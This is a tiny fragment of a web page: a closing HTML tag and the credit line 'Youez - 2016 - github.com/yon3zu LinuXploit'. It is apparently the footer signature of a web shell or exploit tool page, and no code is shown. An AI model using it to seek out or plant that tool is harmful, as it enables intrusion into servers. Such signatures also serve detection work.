</html>

Youez - 2016 - github.com/yon3zu
LinuXploit